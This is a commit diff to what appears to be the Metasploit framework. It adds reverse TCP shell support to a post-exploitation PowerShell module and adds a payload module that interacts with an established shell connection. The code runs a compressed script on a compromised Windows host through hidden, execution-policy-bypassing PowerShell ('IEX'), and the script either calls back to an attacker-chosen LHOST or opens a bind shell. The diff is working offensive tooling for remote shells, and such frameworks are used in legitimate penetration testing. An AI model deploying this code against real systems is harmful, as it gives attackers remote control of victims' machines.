New payloads for reverse_tcp for powershell

bug/bundler_fix
benpturner 2015-04-24 10:25:37 +01:00
parent 9e137c6403
commit 00d8958cc8
3 changed files with 82 additions and 31 deletions

View File

@ -70,7 +70,13 @@ class Metasploit3 < Msf::Exploit::Local
'powerfun.ps1')
script_in = File.read(template_path)
if datastore['LHOST'].to_s.empty?
script_in << "\npowerfun -Command bind"
else
lhost = datastore['LHOST']
script_in << "\npowerfun -Command reverse"
end
mods = ''
@ -85,16 +91,20 @@ class Metasploit3 < Msf::Exploit::Local
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
res = session.sys.process.execute("powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})", nil, 'Hidden' => true, 'Channelized' => false)
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
computer_name = session.sys.config.sysinfo['Computer']
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
if datastore['LHOST'].to_s.empty?
print_status("Attemping to connect to #{rhost}:#{lport}...")
ctimeout = 30
stime = Time.now.to_i
last_error = nil
while stime + ctimeout > Time.now.to_i
Rex::ThreadSafe.sleep(2)
begin
@ -117,7 +127,6 @@ class Metasploit3 < Msf::Exploit::Local
return
end
end
print_warning("If a shell is unsuccesful, ensure you have access to the target host and port.")
print_status("Try adding a route to the host: `route help`")
if last_error
@ -125,5 +134,8 @@ class Metasploit3 < Msf::Exploit::Local
else
fail_with(Failure::Unknown, "Unable to connect")
end
else
print_status("Waiting for connection from #{rhost}:#{lport}...")
end
end
end

View File

@ -0,0 +1,39 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/powershell'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 0
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Command, Interact with Established Connection',
'Description' => 'Interacts with a shell on an established socket connection',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::PowerShell,
'PayloadType' => 'cmd_interact',
'RequiredCmd' => 'generic',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
end